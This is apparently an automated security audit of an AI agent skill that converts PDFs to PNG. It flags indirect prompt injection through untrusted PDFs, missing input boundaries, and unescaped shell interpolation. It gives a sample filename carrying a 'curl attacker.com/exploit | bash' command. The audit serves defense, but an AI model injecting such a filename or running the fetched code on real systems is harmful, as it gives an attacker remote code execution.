convert-pdf-to-png
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
- [Indirect Prompt Injection] (HIGH): The skill processes untrusted PDF files from external sources, which is a significant attack surface. Maliciously crafted PDFs can exploit known vulnerabilities (e.g., ImageTragick) in the suggested backends like ImageMagick or Poppler.
- Ingestion points: PDF files loaded via command-line arguments in
magick,mutool,pdftoppm, and the JS script. - Boundary markers: None. There are no instructions to the agent to treat the input as untrusted or to validate file headers/content.
- Capability inventory: Shell execution of multiple binaries (
magick,mutool,pdftoppm,sips), file system writes for PNG output, and network access for dependency installation. - Sanitization: Absent. The instructions do not include logic to escape shell metacharacters in filenames.
- [Command Execution] (HIGH): The skill's primary function is to generate and execute shell commands using external tools. If the agent interpolates a filename like
; curl attacker.com/exploit | bash ;.pdfdirectly into the provided templates, it will lead to arbitrary command execution. - [External Downloads] (MEDIUM): The JS fallback requires installing the
pdf-to-png-converterpackage from the npm registry. While this is a common package, it introduces a third-party dependency risk that the agent must manage at runtime. - [Metadata Poisoning] (LOW): There is a discrepancy between the markdown description (which mentions
pdfjs) and thepackage.json(which usespdf-to-png-converter), indicating potentially outdated or misleading documentation.
Recommendations
- AI detected serious security threats
Audit Metadata